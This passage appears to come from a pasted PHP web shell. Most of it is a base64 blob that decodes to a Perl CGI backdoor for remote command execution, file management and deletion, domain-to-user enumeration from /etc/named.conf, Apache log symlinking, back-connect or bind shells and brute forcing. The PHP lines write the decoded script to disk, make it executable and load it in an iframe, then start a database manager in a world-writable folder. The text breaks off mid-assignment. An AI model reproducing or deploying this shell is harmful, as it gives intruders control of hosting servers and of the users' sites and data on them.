LS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLQ0Kc3ViIFJtRGlyKCQpIA0Kew0KCW15ICRkaXIgPSBzaGlmdDsNCiAgICBpZihvcGVuZGlyKERJUiwkZGlyKSkNCgl7DQoJCXdoaWxlKCRmaWxlID0gcmVhZGRpcihESVIpKQ0KCQl7DQoJCQlpZigoJGZpbGUgbmUgIi4iKSAmJiAoJGZpbGUgbmUgIi4uIikpDQoJCQl7DQoJCQkJJGZpbGU9ICRkaXIuJFBhdGhTZXAuJGZpbGU7DQoJCQkJaWYoLWQgJGZpbGUpDQoJCQkJew0KCQkJCQkmUm1EaXIoJGZpbGUpOw0KCQkJCX0NCgkJCQllbHNlDQoJCQkJew0KCQkJCQl1bmxpbmsoJGZpbGUpOw0KCQkJCX0NCgkJCX0NCgkJfQ0KCQljbG9zZWRpcihESVIpOw0KCX0NCglpZighcm1kaXIoJGRpcikpDQoJew0KCQkNCgl9DQp9DQpzdWIgRmlsZU93bmVyKCQpDQp7DQoJbXkgJGZpbGUgPSBzaGlmdDsNCglpZigtZSAkZmlsZSkNCgl7DQoJCSgkdWlkLCRnaWQpID0gKHN0YXQoJGZpbGUpKVs0LDVdOw0KCQlpZigkV2luTlQpDQoJCXsNCgkJCXJldHVybiAiPz8/IjsNCgkJfQ0KCQllbHNlDQoJCXsNCgkJCSRuYW1lPWdldHB3dWlkKCR1aWQpOw0KCQkJJGdyb3VwPWdldGdyZ2lkKCRnaWQpOw0KCQkJcmV0dXJuICRuYW1lLiIvIi4kZ3JvdXA7DQoJCX0NCgl9DQoJcmV0dXJuICI/Pz8iOw0KfQ0Kc3ViIFBhcmVudEZvbGRlcigkKQ0Kew0KCW15ICRwYXRoID0gc2hpZnQ7DQoJbXkgJENvbW0gPSAiY2QgXCIkQ3VycmVudERpclwiIi4kQ21kU2VwLiJjZCAuLiIuJENtZFNlcC4kQ21kUHdkOw0KCWNob3AoJHBhdGggPSBgJENvbW1gKTsNCglyZXR1cm4gJHBhdGg7DQp9DQpzdWIgRmlsZVBlcm1zKCQpDQp7DQoJbXkgJGZpbGUgPSBzaGlmdDsNCglteSAkdXIgPSAiLSI7DQoJbXkgJHV3ID0gIi0iOw0KCWlmKC1lICRmaWxlKQ0KCXsNCgkJaWYoJFdpbk5UKQ0KCQl7DQoJCQlpZigtciAkZmlsZSl7ICR1ciA9ICJyIjsgfQ0KCQkJaWYoLXcgJGZpbGUpeyAkdXcgPSAidyI7IH0NCgkJCXJldHVybiAkdXIgLiAiIC8gIiAuICR1dzsNCgkJfWVsc2UNCgkJew0KCQkJJG1vZGU9KHN0YXQoJGZpbGUpKVsyXTsNCgkJCSRyZXN1bHQgPSBzcHJpbnRmKCIlMDRvIiwgJG1vZGUgJiAwNzc3Nyk7DQoJCQlyZXR1cm4gJHJlc3VsdDsNCgkJfQ0KCX0NCglyZXR1cm4gIjAwMDAiOw0KfQ0Kc3ViIEZpbGVMYXN0TW9kaWZpZWQoJCkNCnsNCglteSAkZmlsZSA9IHNoaWZ0Ow0KCWlmKC1lICRmaWxlKQ0KCXsNCgkJKCRsYSkgPSAoc3RhdCgkZmlsZSkpWzldOw0KCQkoJGQsJG0sJHksJGgsJGkpID0gKGxvY2FsdGltZSgkbGEpKVszLDQsNSwyLDFdOw0KCQkkeSA9ICR5ICsgMTkwMDsNCgkJQG1vbnRoID0gcXcvMSAyIDMgNCA1IDYgNyA4IDkgMTAgMTEgMTIvOw0KCQkkbG10aW1lID0gc3ByaW50ZigiJTAyZC8lcy8lNGQgJTAyZDolMDJkIiwkZCwkbW9udGhbJG1dLCR5LCRoLCRpKTsNCgkJcmV0dXJuICRsbXRpbWU7DQoJfQ0KCXJldHVybiAiPz8/IjsNCn0NCnN1YiBGaWxlU2l6ZSgkKQ0Kew0KCW15ICRmaWxlID0gc2hpZnQ7DQoJaWYoLWYgJGZpbGUpDQoJew0KCQlyZXR1cm4gLXMgJGZpbGU7DQoJfQ0KCXJldHVybiAiMCI7DQoNCn0NCnN1YiBQYXJzZUZpbGVTaXplKCQpDQp7DQoJbXkgJHNpemUgPSBzaGlmdDsNCglpZigkc2l6ZSA8PSAxMDI0KQ0KCXsNCgkJcmV0dXJuICRzaXplLiAiIEIiOw0KCX0NCgllbHNlDQoJew0KCQlpZigkc2l6ZSA8PSAxMDI0KjEwMjQpIA0KCQl7DQoJCQkkc2l6ZSA9IHNwcmludGYoIiUuMDJmIiwkc2l6ZSAvIDEwMjQpOw0KCQkJcmV0dXJuICRzaXplLiIgS0IiOw0KCQl9DQoJCWVsc2UgDQoJCXsNCgkJCSRzaXplID0gc3ByaW50ZigiJS4yZiIsJHNpemUgLyAxMDI0IC8gMTAyNCk7DQoJCQlyZXR1cm4gJHNpemUuIiBNQiI7DQoJCX0NCgl9DQp9DQpzdWIgdHJpbSgkKQ0Kew0KCW15ICRzdHJpbmcgPSBzaGlmdDsNCgkkc3RyaW5nID1+IHMvXlxzKy8vOw0KCSRzdHJpbmcgPX4gcy9ccyskLy87DQoJcmV0dXJuICRzdHJpbmc7DQp9DQpzdWIgQWRkU2xhc2hlcygkKQ0Kew0KCW15ICRzdHJpbmcgPSBzaGlmdDsNCgkkc3RyaW5nPX4gcy9cXC9cXFxcL2c7DQoJcmV0dXJuICRzdHJpbmc7DQp9DQpzdWIgTGlzdERpcg0Kew0KCW15ICRwYXRoID0gJEN1cnJlbnREaXIuJFBhdGhTZXA7DQoJJHBhdGg9fiBzL1xcXFwvXFwvZzsNCglteSAkcmVzdWx0ID0gIjxmb3JtIG5hbWU9J2YnIGFjdGlvbj0nJFNjcmlwdExvY2F0aW9uJz48c3BhbiBzdHlsZT0nZm9udDogMTFwdCBWZXJkYW5hOyBmb250LXdlaWdodDogYm9sZDsnPlBhdGg6IFsgIi4mQWRkTGlua0RpcigiZ3VpIikuIiBdIDwvc3Bhbj48aW5wdXQgdHlwZT0ndGV4dCcgbmFtZT0nZCcgc2l6ZT0nNDAnIHZhbHVlPSckQ3VycmVudERpcicgLz48aW5wdXQgdHlwZT0naGlkZGVuJyBuYW1lPSdhJyB2YWx1ZT0nZ3VpJz48aW5wdXQgY2xhc3M9J3N1Ym1pdCcgdHlwZT0nc3VibWl0JyB2YWx1ZT0nQ2hhbmdlJz48L2Zvcm0+IjsNCglpZigtZCAkcGF0aCkNCgl7DQoJCW15IEBmbmFtZSA9ICgpOw0KCQlteSBAZG5hbWUgPSAoKTsNCgkJaWYob3BlbmRpcihESVIsJHBhdGgpKQ0KCQl7DQoJCQl3aGlsZSgkZmlsZSA9IHJlYWRkaXIoRElSKSkNCgkJCXsNCgkJCQkkZj0kcGF0aC4kZmlsZTsNCgkJCQlpZigtZCAkZikNCgkJCQl7DQoJCQkJCXB1c2goQGRuYW1lLCRmaWxlKTsNCgkJCQl9DQoJCQkJZWxzZQ0KCQkJCXsNCgkJCQkJcHVzaChAZm5hbWUsJGZpbGUpOw0KCQkJCX0NCgkJCX0NCgkJCWNsb3NlZGlyKERJUik7DQoJCX0NCgkJQGZuYW1lID0gc29ydCB7IGxjKCRhKSBjbXAgbGMoJGIpIH0gQGZuYW1lOw0KCQlAZG5hbWUgPSBzb3J0IHsgbGMoJGEpIGNtcCBsYygkYikgfSBAZG5hbWU7DQoJCSRyZXN1bHQgLj0gIjxkaXY+PHRhYmxlIHdpZHRoPSc5MCUnIGNsYXNzPSdsaXN0ZGlyJz4NCg0KCQk8dHIgc3R5bGU9J2JhY2tncm91bmQtY29sb3I6ICMzZTNlM2UnPjx0aD5GaWxlIE5hbWU8L3RoPg0KCQk8dGggc3R5bGU9J3dpZHRoOjEwMHB4Oyc+RmlsZSBTaXplPC90aD4NCgkJPHRoIHN0eWxlPSd3aWR0aDoxNTBweDsnPk93bmVyPC90aD4NCgkJPHRoIHN0eWxlPSd3aWR0aDoxMDBweDsnPlBlcm1pc3Npb248L3RoPg0KCQk8dGggc3R5bGU9J3dpZHRoOjE1MHB4Oyc+TGFzdCBNb2RpZmllZDwvdGg+DQoJCTx0aCBzdHlsZT0nd2lkdGg6MjYwcHg7Jz5BY3Rpb248L3RoPjwvdHI+IjsNCgkJbXkgJHN0eWxlPSJsaW5lIjsNCgkJbXkgJGk9MDsNCgkJZm9yZWFjaCBteSAkZCAoQGRuYW1lKQ0KCQl7DQoJCQkkc3R5bGU9ICgkc3R5bGUgZXEgImxpbmUiKSA/ICJub3RsaW5lIjogImxpbmUiOw0KCQkJJGQgPSAmdHJpbSgkZCk7DQoJCQkkZGlybmFtZT0kZDsNCgkJCWlmKCRkIGVxICIuLiIpIA0KCQkJew0KCQkJCSRkID0gJlBhcmVudEZvbGRlcigkcGF0aCk7DQoJCQl9DQoJCQllbHNpZigkZCBlcSAiLiIpIA0KCQkJew0KCQkJCSRkID0gJHBhdGg7DQoJCQl9DQoJCQllbHNlIA0KCQkJew0KCQkJCSRkID0gJHBhdGguJGQ7DQoJCQl9DQoJCQkkcmVzdWx0IC49ICI8dHIgY2xhc3M9JyRzdHlsZSc+DQoNCgkJCTx0ZCBpZD0nRmlsZV8kaScgc3R5bGU9J2ZvbnQ6IDExcHQgVmVyZGFuYTsgZm9udC13ZWlnaHQ6IGJvbGQ7Jz48YSAgaHJlZj0nP2E9Z3VpJmQ9Ii4kZC4iJz5bICIuJGRpcm5hbWUuIiBdPC9hPjwvdGQ+IjsNCgkJCSRyZXN1bHQgLj0gIjx0ZD5ESVI8L3RkPiI7DQoJCQkkcmVzdWx0IC49ICI8dGQgc3R5bGU9J3RleHQtYWxpZ246Y2VudGVyOyc+Ii4mRmlsZU93bmVyKCRkKS4iPC90ZD4iOw0KCQkJJHJlc3VsdCAuPSAiPHRkIGlkPSdGaWxlUGVybXNfJGknIHN0eWxlPSd0ZXh0LWFsaWduOmNlbnRlcjsnIG9uZGJsY2xpY2s9XCJybV9jaG1vZF9mb3JtKHRoaXMsIi4kaS4iLCciLiZGaWxlUGVybXMoJGQpLiInLCciLiRkaXJuYW1lLiInKVwiID48c3BhbiBvbmNsaWNrPVwiY2htb2RfZm9ybSgiLiRpLiIsJyIuJGRpcm5hbWUuIicpXCIgPiIuJkZpbGVQZXJtcygkZCkuIjwvc3Bhbj48L3RkPiI7DQoJCQkkcmVzdWx0IC49ICI8dGQgc3R5bGU9J3RleHQtYWxpZ246Y2VudGVyOyc+Ii4mRmlsZUxhc3RNb2RpZmllZCgkZCkuIjwvdGQ+IjsNCgkJCSRyZXN1bHQgLj0gIjx0ZCBzdHlsZT0ndGV4dC1hbGlnbjpjZW50ZXI7Jz48YSBocmVmPSdqYXZhc2NyaXB0OnJldHVybiBmYWxzZTsnIG9uY2xpY2s9XCJyZW5hbWVfZm9ybSgkaSwnJGRpcm5hbWUnLCciLiZBZGRTbGFzaGVzKCZBZGRTbGFzaGVzKCRkKSkuIicpXCI+UmVuYW1lPC9hPiAgfCA8YSBvbmNsaWNrPVwiaWYoIWNvbmZpcm0oJ1JlbW92ZSBkaXI6ICRkaXJuYW1lID8nKSkgeyByZXR1cm4gZmFsc2U7fVwiIGhyZWY9Jz9hPWd1aSZkPSRwYXRoJnJlbW92ZT0kZGlybmFtZSc+UmVtb3ZlPC9hPjwvdGQ+IjsNCgkJCSRyZXN1bHQgLj0gIjwvdHI+IjsNCgkJCSRpKys7DQoJCX0NCgkJZm9yZWFjaCBteSAkZiAoQGZuYW1lKQ0KCQl7DQoJCQkkc3R5bGU9ICgkc3R5bGUgZXEgImxpbmUiKSA/ICJub3RsaW5lIjogImxpbmUiOw0KCQkJJGZpbGU9JGY7DQoJCQkkZiA9ICRwYXRoLiRmOw0KCQkJJHZpZXcgPSAiP2Rpcj0iLiRwYXRoLiImdmlldz0iLiRmOw0KCQkJJHJlc3VsdCAuPSAiPHRyIGNsYXNzPSckc3R5bGUnPjx0ZCBpZD0nRmlsZV8kaScgc3R5bGU9J2ZvbnQ6IDExcHQgVmVyZGFuYTsnPjxhIGhyZWY9Jz9hPWNvbW1hbmQmZD0iLiRwYXRoLiImYz1lZGl0JTIwIi4kZmlsZS4iJz4iLiRmaWxlLiI8L2E+PC90ZD4iOw0KCQkJJHJlc3VsdCAuPSAiPHRkPiIuJlBhcnNlRmlsZVNpemUoJkZpbGVTaXplKCRmKSkuIjwvdGQ+IjsNCgkJCSRyZXN1bHQgLj0gIjx0ZCBzdHlsZT0ndGV4dC1hbGlnbjpjZW50ZXI7Jz4iLiZGaWxlT3duZXIoJGYpLiI8L3RkPiI7DQoJCQkkcmVzdWx0IC49ICI8dGQgaWQ9J0ZpbGVQZXJtc18kaScgc3R5bGU9J3RleHQtYWxpZ246Y2VudGVyOycgb25kYmxjbGljaz1cInJtX2NobW9kX2Zvcm0odGhpcywiLiRpLiIsJyIuJkZpbGVQZXJtcygkZikuIicsJyIuJGZpbGUuIicpXCIgPjxzcGFuIG9uY2xpY2s9XCJjaG1vZF9mb3JtKCRpLCckZmlsZScpXCIgPiIuJkZpbGVQZXJtcygkZikuIjwvc3Bhbj48L3RkPiI7DQoJCQkkcmVzdWx0IC49ICI8dGQgc3R5bGU9J3RleHQtYWxpZ246Y2VudGVyOyc+Ii4mRmlsZUxhc3RNb2RpZmllZCgkZikuIjwvdGQ+IjsNCgkJCSRyZXN1bHQgLj0gIjx0ZCBzdHlsZT0ndGV4dC1hbGlnbjpjZW50ZXI7Jz48YSBocmVmPSc/YT1jb21tYW5kJmQ9Ii4kcGF0aC4iJmM9ZWRpdCUyMCIuJGZpbGUuIic+RWRpdDwvYT4gfCA8YSBocmVmPSdqYXZhc2NyaXB0OnJldHVybiBmYWxzZTsnIG9uY2xpY2s9XCJyZW5hbWVfZm9ybSgkaSwnJGZpbGUnLCdmJylcIj5SZW5hbWU8L2E+IHwgPGEgaHJlZj0nP2E9ZG93bmxvYWQmbz1nbyZmPSIuJGYuIic+RG93bmxvYWQ8L2E+IHwgPGEgb25jbGljaz1cImlmKCFjb25maXJtKCdSZW1vdmUgZmlsZTogJGZpbGUgPycpKSB7IHJldHVybiBmYWxzZTt9XCIgaHJlZj0nP2E9Z3VpJmQ9JHBhdGgmcmVtb3ZlPSRmaWxlJz5SZW1vdmU8L2E+PC90ZD4iOw0KCQkJJHJlc3VsdCAuPSAiPC90cj4iOw0KCQkJJGkrKzsNCgkJfQ0KCQkkcmVzdWx0IC49ICI8L3RhYmxlPjwvZGl2PiI7DQoJfQ0KCXJldHVybiAkcmVzdWx0Ow0KfQ0KIy0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLQ0KIyBUcnkgdG8gVmlldyBMaXN0IFVzZXINCiMtLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0NCnN1YiBWaWV3RG9tYWluVXNlcg0Kew0KCW9wZW4gKGRvbWFpbnMsICcvZXRjL25hbWVkLmNvbmYnKSBvciAkZXJyPTE7DQoJbXkgQGNuenMgPSA8ZG9tYWlucz47DQoJY2xvc2UgZDBtYWluczsNCglteSAkc3R5bGU9ImxpbmUiOw0KCW15ICRyZXN1bHQ9IjxoNT48Zm9udCBzdHlsZT0nZm9udDogMTVwdCBWZXJkYW5hO2NvbG9yOiAjZmY5OTAwOyc+SG9hbmcgU2EgLSBUcnVvbmcgU2E8L2ZvbnQ+PC9oNT4iOw0KCWlmICgkZXJyKQ0KCXsNCgkJJHJlc3VsdCAuPSAgKCc8cD5DMHVsZG5cJ3QgQnlwYXNzIGl0ICwgU29ycnk8L3A+Jyk7DQoJCXJldHVybiAkcmVzdWx0Ow0KCX1lbHNlDQoJew0KCQkkcmVzdWx0IC49ICc8dGFibGU+PHRyPjx0aD5Eb21haW5zPC90aD4gPHRoPlVzZXI8L3RoPjwvdHI+JzsNCgl9DQoJZm9yZWFjaCBteSAkb25lIChAY256cykNCgl7DQoJCWlmKCRvbmUgPX4gbS8uKj96b25lICIoLio/KSIgey8pDQoJCXsJDQoJCQkkc3R5bGU9ICgkc3R5bGUgZXEgImxpbmUiKSA/ICJub3RsaW5lIjogImxpbmUiOw0KCQkJJGZpbGVuYW1lPSAiL2V0Yy92YWxpYXNlcy8iLiRvbmU7DQoJCQkkb3duZXIgPSBnZXRwd3VpZCgoc3RhdCgkZmlsZW5hbWUpKVs0XSk7DQoJCQkkcmVzdWx0IC49ICc8dHIgY2xhc3M9IiRzdHlsZSIgd2lkdGg9NTAlPjx0ZD4nLiRvbmUuJyA8L3RkPjx0ZD4gJy4kb3duZXIuJzwvdGQ+PC90cj4nOw0KCQl9DQoJfQ0KCSRyZXN1bHQgLj0gJzwvdGFibGU+JzsNCglyZXR1cm4gJHJlc3VsdDsNCn0NCiMtLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0NCiMgVmlldyBMb2cNCiMtLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0NCnN1YiBWaWV3TG9nDQp7DQoJaWYoJFdpbk5UKQ0KCXsNCgkJcmV0dXJuICI8aDI+PGZvbnQgc3R5bGU9J2ZvbnQ6IDIwcHQgVmVyZGFuYTtjb2xvcjogI2ZmOTkwMDsnPkRvbid0IHJ1biBvbiBXaW5kb3dzPC9mb250PjwvaDI+IjsNCgl9DQoJbXkgJHJlc3VsdD0iPHRhYmxlPjx0cj48dGg+UGF0aCBMb2c8L3RoPjx0aD5TdWJtaXQ8L3RoPjwvdHI+IjsNCglteSBAcGF0aGxvZz0oDQoJCQkJJy91c3IvbG9jYWwvYXBhY2hlL2xvZ3MvZXJyb3JfbG9nJywNCgkJCQknL3Zhci9sb2cvaHR0cGQvZXJyb3JfbG9nJywNCgkJCQknL3Vzci9sb2NhbC9hcGFjaGUvbG9ncy9hY2Nlc3NfbG9nJw0KCQkJCSk7DQoJbXkgJGk9MDsNCglteSAkcGVybXM7DQoJbXkgJHNsOw0KCWZvcmVhY2ggbXkgJGxvZyAoQHBhdGhsb2cpDQoJew0KCQlpZigtdyAkbG9nKQ0KCQl7DQoJCQkkcGVybXM9Ik9LIjsNCgkJfWVsc2UNCgkJew0KCQkJY2hvcCgkc2wgPSBgbG4gLXMgJGxvZyBlcnJvcl9sb2dfJGlgKTsNCgkJCWlmKCZ0cmltKCRscykgZXEgIiIpDQoJCQl7DQoJCQkJaWYoLXIgJGxzKQ0KCQkJCXsNCgkJCQkJJHBlcm1zPSJPSyI7DQoJCQkJCSRsb2c9ImVycm9yX2xvZ18iLiRpOw0KCQkJCX0NCgkJCX1lbHNlDQoJCQl7DQoJCQkJJHBlcm1zPSI8Zm9udCBzdHlsZT0nY29sb3I6IHJlZDsnPkNhbmNlbDxmb250PiI7DQoJCQl9DQoJCX0NCgkJJHJlc3VsdCAuPTw8RU5EOw0KCQk8dHI+DQoNCgkJCTxmb3JtIGFjdGlvbj0iIiBtZXRob2Q9InBvc3QiPg0KCQkJPHRkPjxpbnB1dCB0eXBlPSJ0ZXh0IiBvbmtleXVwPSJkb2N1bWVudC5nZXRFbGVtZW50QnlJZCgnbG9nXyRpJykudmFsdWU9J2xlc3MgJyArIHRoaXMudmFsdWU7IiB2YWx1ZT0iJGxvZyIgc2l6ZT0nNTAnLz48L3RkPg0KCQkJPHRkPjxpbnB1dCBjbGFzcz0ic3VibWl0IiB0eXBlPSJzdWJtaXQiIHZhbHVlPSJUcnkiIC8+PC90ZD4NCgkJCTxpbnB1dCB0eXBlPSJoaWRkZW4iIGlkPSJsb2dfJGkiIG5hbWU9ImMiIHZhbHVlPSJsZXNzICRsb2ciLz4NCgkJCTxpbnB1dCB0eXBlPSJoaWRkZW4iIG5hbWU9ImEiIHZhbHVlPSJjb21tYW5kIiAvPg0KCQkJPGlucHV0IHR5cGU9ImhpZGRlbiIgbmFtZT0iZCIgdmFsdWU9IiRDdXJyZW50RGlyIiAvPg0KCQkJPC9mb3JtPg0KCQkJPHRkPiRwZXJtczwvdGQ+DQoNCgkJPC90cj4NCkVORA0KCQkkaSsrOw0KCX0NCgkkcmVzdWx0IC49IjwvdGFibGU+IjsNCglyZXR1cm4gJHJlc3VsdDsNCn0NCiMtLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0NCiMgTWFpbiBQcm9ncmFtIC0gRXhlY3V0aW9uIFN0YXJ0cyBIZXJlDQojLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tDQomUmVhZFBhcnNlOw0KJkdldENvb2tpZXM7DQoNCiRTY3JpcHRMb2NhdGlvbiA9ICRFTlZ7J1NDUklQVF9OQU1FJ307DQokU2VydmVyTmFtZSA9ICRFTlZ7J1NFUlZFUl9OQU1FJ307DQokTG9naW5QYXNzd29yZCA9ICRpbnsncCd9Ow0KJFJ1bkNvbW1hbmQgPSAkaW57J2MnfTsNCiRUcmFuc2ZlckZpbGUgPSAkaW57J2YnfTsNCiRPcHRpb25zID0gJGlueydvJ307DQokQWN0aW9uID0gJGlueydhJ307DQoNCiRBY3Rpb24gPSAiY29tbWFuZCIgaWYoJEFjdGlvbiBlcSAiIik7ICMgbm8gYWN0aW9uIHNwZWNpZmllZCwgdXNlIGRlZmF1bHQNCg0KIyBnZXQgdGhlIGRpcmVjdG9yeSBpbiB3aGljaCB0aGUgY29tbWFuZHMgd2lsbCBiZSBleGVjdXRlZA0KJEN1cnJlbnREaXIgPSAmdHJpbSgkaW57J2QnfSk7DQojIG1hYyBkaW5oIHh1YXQgdGhvbmcgdGluIG5ldSBrbyBjbyBsZW5oIG5hbyENCiRSdW5Db21tYW5kPSAkV2luTlQ/ImRpciI6ImRpciAtbGlhIiBpZigkUnVuQ29tbWFuZCBlcSAiIik7DQpjaG9wKCRDdXJyZW50RGlyID0gYCRDbWRQd2RgKSBpZigkQ3VycmVudERpciBlcSAiIik7DQoNCiRMb2dnZWRJbiA9ICRDb29raWVzeydTQVZFRFBXRCd9IGVxICRQYXNzd29yZDsNCg0KaWYoJEFjdGlvbiBlcSAibG9naW4iIHx8ICEkTG9nZ2VkSW4pIAkJIyB1c2VyIG5lZWRzL2hhcyB0byBsb2dpbg0Kew0KCSZQZXJmb3JtTG9naW47DQp9ZWxzaWYoJEFjdGlvbiBlcSAiZ3VpIikgIyBHVUkgZGlyZWN0b3J5DQp7DQoJJlByaW50UGFnZUhlYWRlcjsNCglpZighJFdpbk5UKQ0KCXsNCgkJJGNobW9kPWludCgkaW57J2NobW9kJ30pOw0KCQlpZighKCRjaG1vZCBlcSAwKSkNCgkJew0KCQkJJGNobW9kPWludCgkaW57J2NobW9kJ30pOw0KCQkJJGZpbGU9JEN1cnJlbnREaXIuJFBhdGhTZXAuJFRyYW5zZmVyRmlsZTsNCgkJCWNob3AoJHJlc3VsdD0gYGNobW9kICRjaG1vZCAiJGZpbGUiYCk7DQoJCQlpZigmdHJpbSgkcmVzdWx0KSBlcSAiIikNCgkJCXsNCgkJCQlwcmludCAiPHJ1bj4gRG9uZSEgPC9ydW4+PGJyPiI7DQoJCQl9ZWxzZQ0KCQkJew0KCQkJCXByaW50ICI8cnVuPiBTb3JyeSEgWW91IGRvbnQgaGF2ZSBwZXJtaXNzaW9ucyEgPC9ydW4+PGJyPiI7DQoJCQl9DQoJCX0NCgl9DQoJJHJlbmFtZT0kaW57J3JlbmFtZSd9Ow0KCWlmKCEkcmVuYW1lIGVxICIiKQ0KCXsNCgkJaWYocmVuYW1lKCRUcmFuc2ZlckZpbGUsJHJlbmFtZSkpDQoJCXsNCgkJCXByaW50ICI8cnVuPiBEb25lISA8L3J1bj48YnI+IjsNCgkJfWVsc2UNCgkJew0KCQkJcHJpbnQgIjxydW4+IFNvcnJ5ISBZb3UgZG9udCBoYXZlIHBlcm1pc3Npb25zISA8L3J1bj48YnI+IjsNCgkJfQ0KCX0NCgkkcmVtb3ZlPSRpbnsncmVtb3ZlJ307DQoJaWYoJHJlbW92ZSBuZSAiIikNCgl7DQoJCSRybSA9ICRDdXJyZW50RGlyLiRQYXRoU2VwLiRyZW1vdmU7DQoJCWlmKC1kICRybSkNCgkJew0KCQkJJlJtRGlyKCRybSk7DQoJCX1lbHNlDQoJCXsNCgkJCWlmKHVubGluaygkcm0pKQ0KCQkJew0KCQkJCXByaW50ICI8cnVuPiBEb25lISA8L3J1bj48YnI+IjsNCgkJCX1lbHNlDQoJCQl7DQoJCQkJcHJpbnQgIjxydW4+IFNvcnJ5ISBZb3UgZG9udCBoYXZlIHBlcm1pc3Npb25zISA8L3J1bj48YnI+IjsNCgkJCX0JCQkNCgkJfQ0KCX0NCglwcmludCAmTGlzdERpcjsNCg0KfQ0KZWxzaWYoJEFjdGlvbiBlcSAiY29tbWFuZCIpCQkJCSAJIyB1c2VyIHdhbnRzIHRvIHJ1biBhIGNvbW1hbmQNCnsNCgkmUHJpbnRQYWdlSGVhZGVyKCJjIik7DQoJcHJpbnQgJkV4ZWN1dGVDb21tYW5kOw0KfQ0KZWxzaWYoJEFjdGlvbiBlcSAic2F2ZSIpCQkJCSAJIyB1c2VyIHdhbnRzIHRvIHNhdmUgYSBmaWxlDQp7DQoJJlByaW50UGFnZUhlYWRlcjsNCglpZigmU2F2ZUZpbGUoJGlueydkYXRhJ30sJGlueydmaWxlJ30pKQ0KCXsNCgkJcHJpbnQgIjxydW4+IERvbmUhIDwvcnVuPjxicj4iOw0KCX1lbHNlDQoJew0KCQlwcmludCAiPHJ1bj4gU29ycnkhIFlvdSBkb250IGhhdmUgcGVybWlzc2lvbnMhIDwvcnVuPjxicj4iOw0KCX0NCglwcmludCAmTGlzdERpcjsNCn0NCmVsc2lmKCRBY3Rpb24gZXEgInVwbG9hZCIpIAkJCQkJIyB1c2VyIHdhbnRzIHRvIHVwbG9hZCBhIGZpbGUNCnsNCgkmUHJpbnRQYWdlSGVhZGVyOw0KDQoJcHJpbnQgJlVwbG9hZEZpbGU7DQp9DQplbHNpZigkQWN0aW9uIGVxICJiYWNrYmluZCIpIAkJCQkjIHVzZXIgd2FudHMgdG8gYmFjayBjb25uZWN0IG9yIGJpbmQgcG9ydA0Kew0KCSZQcmludFBhZ2VIZWFkZXIoImNsaWVudHBvcnQiKTsNCglwcmludCAmQmFja0JpbmQ7DQp9DQplbHNpZigkQWN0aW9uIGVxICJicnV0ZWZvcmNlciIpIAkJCSMgdXNlciB3YW50cyB0byBicnV0ZSBmb3JjZQ0Kew0KCSZQcmludFBhZ2VIZWFkZXI7DQoJcHJpbnQgJkJydXRlRm9yY2VyOw0KfWVsc2lmKCRBY3Rpb24gZXEgImRvd25sb2FkIikgCQkJCSMgdXNlciB3YW50cyB0byBkb3dubG9hZCBhIGZpbGUNCnsNCglwcmludCAmRG93bmxvYWRGaWxlOw0KfWVsc2lmKCRBY3Rpb24gZXEgImNoZWNrbG9nIikgCQkJCSMgdXNlciB3YW50cyB0byB2aWV3IGxvZyBmaWxlDQp7DQoJJlByaW50UGFnZUhlYWRlcjsNCglwcmludCAmVmlld0xvZzsNCg0KfWVsc2lmKCRBY3Rpb24gZXEgImRvbWFpbnN1c2VyIikgCQkJIyB1c2VyIHdhbnRzIHRvIHZpZXcgbGlzdCB1c2VyL2RvbWFpbg0Kew0KCSZQcmludFBhZ2VIZWFkZXI7DQoJcHJpbnQgJlZpZXdEb21haW5Vc2VyOw0KfWVsc2lmKCRBY3Rpb24gZXEgImxvZ291dCIpIAkJCQkjIHVzZXIgd2FudHMgdG8gbG9nb3V0DQp7DQoJJlBlcmZvcm1Mb2dvdXQ7DQp9DQomUHJpbnRQYWdlRm9vdGVyOw==';
  1763. $file = fopen("telnet.cok" ,"w+");
  1764. $write = fwrite ($file ,base64_decode($cgi2012));
  1765. fclose($file);
  1766. chmod("telnet.cok",0755);
  1767. echo "<iframe src=telnet/telnet.cok width=96% height=76% frameborder=0></iframe></div>";
  1768. }
  1769.  
  1770.  
  1771. # x=mysql2
  1772. elseif(isset($_GET['x']) && ($_GET['x'] == 'mysql2')) {
  1773.  
  1774. echo "<center><br/><br/><nobr><b><span class='b7'>O=:[ MYSQL</span> <span class='b8'>MANAGER ]:=O</span></b></nobr><br/><br/> ";
  1775. echo "</br></br><center><b><span class='b11'> You Can Go To : <a href='angel/db.php' target='_blank'>[+] HERE [+]</a></center></span></br>";
  1776. if (!is_dir('angel')){
  1777. $mk = @mkdir('angel',0777);
  1778. @fwrite($f , $c);
  1779. $f2 =@fopen('angel/db.php','w');
  1780. $sml_db =
